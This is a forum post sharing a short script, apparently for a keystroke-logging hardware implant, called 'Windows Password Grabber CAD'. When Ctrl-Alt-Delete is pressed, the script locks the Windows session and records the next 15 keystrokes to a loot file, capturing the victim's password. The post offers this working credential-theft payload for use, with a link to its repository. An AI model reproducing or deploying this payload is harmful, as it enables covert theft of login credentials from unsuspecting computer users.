Jump to content

[PAYLOAD] Windows Password Grabber CAD


RootJunky

Recommended Posts

Windows Password Grabber CAD

 

This is a simple payload used to logout ones control alt delete is pressed on a windows PC, then it will capture the next 15 buttons pressed.  You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. 

# Title:         Windows Password Grabber
# Description:   When Control Alt Delete is pressed it will long out the current user and request a password that will be captured and stored in loot. 
# Author:        RootJunky
# Version:       1.0
# Category:      Credentials 
#
#
MATCH \[CONTROL-ALT-DELETE\]
LED ATTACK STAGE1
QUACK STRING "GUI l" 
SAVEKEYS /root/loot/password.log NEXT 15
QUACK DELAY 1000
LED OFF

https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt

 

Edited by RootJunky
needed correction
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...